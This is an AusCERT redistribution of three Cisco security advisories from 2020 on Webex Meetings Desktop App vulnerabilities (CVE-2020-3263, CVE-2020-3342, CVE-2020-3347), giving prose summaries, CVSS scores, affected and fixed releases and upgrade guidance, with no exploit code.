Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2020.2116.4 Cisco Webex Meetings Desktop App Vulnerabilities 12 August 2020 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Webex Meetings Desktop App Publisher: Cisco Systems Operating System: Cisco Windows Mac OS Impact/Access: Execute Arbitrary Code/Commands -- Remote with User Interaction Access Confidential Data -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2020-3347 CVE-2020-3342 CVE-2020-3263 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-url-fcmpdfVY https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-mac-X7vp65BL https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt Revision History: August 12 2020: Updated fcmpdfVY to advisory v1.1 July 8 2020: Fixed software section for NBmqM9vt has been updated June 24 2020: Vendor provided information update to NBmqM9vt June 18 2020: Initial Release - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Webex Meetings Desktop App and Webex Meetings Client URL Filtering Arbitrary Program Execution Vulnerability Priority: High Advisory ID: cisco-sa-webex-client-url-fcmpdfVY First Published: 2020 June 17 16:00 GMT Last Updated: 2020 August 11 16:29 GMT Version 1.1: Final Workarounds: No workarounds availableCisco Bug IDs: CSCvs52337 CVE-2020-3263 CWE-20 CVSS Score: 7.5 AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:X/RL:X/RC:X Summary o A vulnerability in Cisco Webex Meetings Desktop App and Cisco Webex Meetings Client could allow an unauthenticated, remote attacker to execute programs on an affected end-user system. The vulnerability is due to improper validation of input that is supplied to application URLs. The attacker could exploit this vulnerability by persuading a user to follow a malicious URL. A successful exploit could allow the attacker to cause the application to execute other programs that are already present on the end-user system. If malicious files are planted on the system or on an accessible network file path, the attacker could execute arbitrary code on the affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/ cisco-sa-webex-client-url-fcmpdfVY Affected Products o Vulnerable Products This vulnerability affects Cisco Webex Meetings Desktop App and Cisco Webex Meetings Client releases earlier than Release 39.5.12. To determine which release of Cisco Webex Meetings Desktop App is installed on a system, see the Check the Cisco Webex Meetings Desktop App Version help article. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o Cisco has released free software updates that address the vulnerability described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license: https://www.cisco.com/c/en/us/products/ end-user-license-agreement.html Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades. When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories and Alerts page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Customers Without Service Contracts Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c /en/us/support/web/tsd-cisco-worldwide-contacts.html Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade. Fixed Releases Cisco fixed this vulnerability in Cisco Webex Meetings Desktop App and Cisco Webex Meetings Client releases 40.1.0 and later. For lockdown versions of Cisco Webex Meetings Desktop App and Cisco Webex Meetings Client, Cisco fixed this vulnerability in releases 39.5.12 and later. Administrators can update the Cisco Webex Meetings Desktop App for their user bases by following the instructions in the IT Administrator Guide for Mass Deployment of the Cisco Webex Meetings Desktop App . Users can update the Cisco Webex Meetings Desktop App by following the instructions in the Update the Cisco Webex Meetings Desktop App article. Users can update the Cisco Webex Meetings Client by following the instructions in the Download the Webex Client article. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. Action Links for This Advisory o Snort Rule 54358 Snort Rule 54359 Snort Rule 54360 Snort Rule 54361 Snort Rule 54362 Snort Rule 54363 Snort Rule 54364 Snort Rule 54365 Snort Rule 54366 Snort Rule 54367 Snort Rule 54368 Snort Rule 54369 Snort Rule 54370 Snort Rule 54371 Snort Rule 54372 Show All 15... URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/ cisco-sa-webex-client-url-fcmpdfVY Revision History o +---------+----------------------+-----------------+--------+-------------+ | Version | Description | Section | Status | Date | +---------+----------------------+-----------------+--------+-------------+ | | Updated the title | Title, Summary, | | | | 1.1 | and several sections | Vulnerable | Final | 2020-AUG-11 | | | to include Webex | Products, and | | | | | Meetings Client. | Fixed Software | | | +---------+----------------------+-----------------+--------+-------------+ | 1.0 | Initial public | - | Final | 2020-JUN-17 | | | release. | | | | +---------+----------------------+-----------------+--------+-------------+ - -------------------------------------------------------------------------------- Cisco Webex Meetings Desktop App for Mac Update Feature Code Execution Vulnerability Priority: High Advisory ID: cisco-sa-webex-client-mac-X7vp65BL First Published: 2020 June 17 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvq03838 CVE-2020-3342 CWE-295 CVSS Score: 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:X/RL:X/RC:X Summary o A vulnerability in the software update feature of Cisco Webex Meetings Desktop App for Mac could allow an unauthenticated, remote attacker to execute arbitrary code on an affected system. The vulnerability is due to improper validation of cryptographic protections on files that are downloaded by the application as part of a software update. An attacker could exploit this vulnerability by persuading a user to go to a website that returns files to the client that are similar to files that are returned from a valid Webex website. The client may fail to properly validate the cryptographic protections of the provided files before executing them as part of an update. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the user. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/ cisco-sa-webex-client-mac-X7vp65BL Affected Products o Vulnerable Products This vulnerability affects lockdown versions of Cisco Webex Meetings Desktop App for Mac earlier than Release 39.5.11. To determine which release of Cisco Webex Meetings Client for Mac is installed on a system, see the Check the Cisco Webex Meetings Desktop App Version help article. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Cisco Webex Meetings Desktop App for Windows is not affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o Cisco has released free software updates that address the vulnerability described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license: https://www.cisco.com/c/en/us/products/ end-user-license-agreement.html Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades. When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories and Alerts page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Customers Without Service Contracts Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c /en/us/support/web/tsd-cisco-worldwide-contacts.html Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade. Fixed Releases Cisco fixed this vulnerability in lockdown versions of Cisco Webex Meetings Desktop App for Mac releases 39.5.11 and later. Administrators can update the Cisco Webex Meetings Desktop App for their user bases by following the instructions available in the IT Administrator Guide for Mass Deployment of the Cisco Webex Meetings Desktop App . Users can update the Cisco Webex Meetings Desktop App by following the instructions in the Update the Cisco Webex Meetings Desktop App article. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found by Nick Mooney of Cisco Duo Security Labs during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/ cisco-sa-webex-client-mac-X7vp65BL Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2020-JUN-17 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco Webex Meetings Desktop App for Windows Shared Memory Information Disclosure Vulnerability Priority: Medium Advisory ID: cisco-sa-webex-client-NBmqM9vt First Published: 2020 June 17 16:00 GMT Last Updated: 2020 July 7 14:28 GMT Version 1.3: Final Workarounds: No workarounds availableCisco Bug IDs: CSCvt99384 CVE-2020-3347 CWE-200 CVSS Score: 5.5 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X Summary o A vulnerability in Cisco Webex Meetings Desktop App for Windows could allow an authenticated, local attacker to gain access to sensitive information on an affected system. The vulnerability is due to unsafe usage of shared memory that is used by the affected software. An attacker with permissions to view system memory could exploit this vulnerability by running an application on the local system that is designed to read shared memory. A successful exploit could allow the attacker to retrieve sensitive information from the shared memory, including usernames, meeting information, or authentication tokens that could aid the attacker in future attacks. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/ cisco-sa-webex-client-NBmqM9vt Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco Webex Meetings Desktop App for Windows releases earlier than 40.4.12 and 40.6.0. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Details o Cisco Webex Meetings Desktop App uses shared memory to exchange information with the Windows operating system and other applications. The software may store sensitive information-such as usernames, meeting information, and authentication tokens-in this shared memory space. Other users on the local system could retrieve this information from within the shared memory space and use it for additional attacks. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories and Alerts page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, the following releases contained the fix for this vulnerability: Cisco Webex Product Fixed Release Cisco Webex Meetings Desktop App for 40.4.12 and later Windows 40.6.0 and later Cisco Webex Meetings Desktop App for 39.5.26 and later Windows, lockdown versions 3.0 MR3 SecurityPatch 3 and later Cisco Webex Meetings Server 4.0 MR3 Security Patch 2 and later See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerability that is described in this advisory. The Cisco PSIRT is not aware of any malicious use of the vulnerability that is described in this advisory. Source o Cisco would like to thank Martin Rakhmanov of Trustwave for reporting this vulnerability. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/ cisco-sa-webex-client-NBmqM9vt Revision History o +---------+---------------------------+------------+--------+-------------+ | Version | Description | Section | Status | Date | +---------+---------------------------+------------+--------+-------------+ | | Added update information | Fixed | | | | 1.3 | for Cisco Webex Meetings | Software | Final | 2020-JUL-07 | | | Server. | | | | +---------+---------------------------+------------+--------+-------------+ | | Included additional fix | Vulnerable | | | | 1.2 | information for the Cisco | Products, | Final | 2020-JUN-23 | | | Webex Desktop App release | Fixed | | | | | 40.4.12. | Software | | | +---------+---------------------------+------------+--------+-------------+ | | Clarified affected | | | | | 1.1 | versions of Cisco Webex | Affected | Final | 2020-JUN-17 | | | Meetings Desktop App for | Products | | | | | Windows. | | | | +---------+---------------------------+------------+--------+-------------+ | 1.0 | Initial public release. | - | Final | 2020-JUN-17 | +---------+---------------------------+------------+--------+-------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBXzN4tONLKJtyKPYoAQiWTg/7B0Uj6N2axXOODz3F7gHucCj/BqaSnWpo iTdkrVcnlRiopTEavhew+t9uTVOi/QvTlyhJmI1TCg/KgVEvratqwHBRJfSuP6zX NzKPRjsaZDAd0IMLw1bw+zwas67NTAV0e91UCCgv+SWN2typFa+aHqeVS7QneRAJ T0an/+c9jFxE/cR/aT4v0xlrOPa+ub3EKIYr/X6GwirvvvbdKwGX4p5pwT3Coh/1 GeY9Sc+BbYx0OgoBNF/R75HboZHNUoxl28PvpXlfxY4YMYG4B98PXPAuTuIfoc8s efUpqTRuu9pueBuH4T7t/SriY8tnU0Ckwie9gjM1zF7C0NndkEhXkfXuHO8z7BI7 mguvnpPg1gIfDaX6sED2H0QTfLZS5hGJWfMB8HbtSj6s/5pMiuPgsYlGuhnBiTrN UYKOXsudrYJrfcKX6bIpjCdCP8uN3hGdqulR8kME9Isu6BEr/Pv2b2CRQlUc9Odh YXvP3PP42/esHS2NB2uCAOwoRdbFpi83lxst+5vZspa/2LTQkyaQMvExxoKY0QzD xEH+MaRgAPr4QXEMdQ0fZVYm9fGbbUliXPkf31CnVGBU7/6ZUSUjmg6q0GNRbaLu PQ/louh1K737Hyoy8L5es8XtH0FYqWQGWYR+hoc3opawi9dN6czMiB3ySjzxq53Q NzPhfIFs7mM= =bahe -----END PGP SIGNATURE-----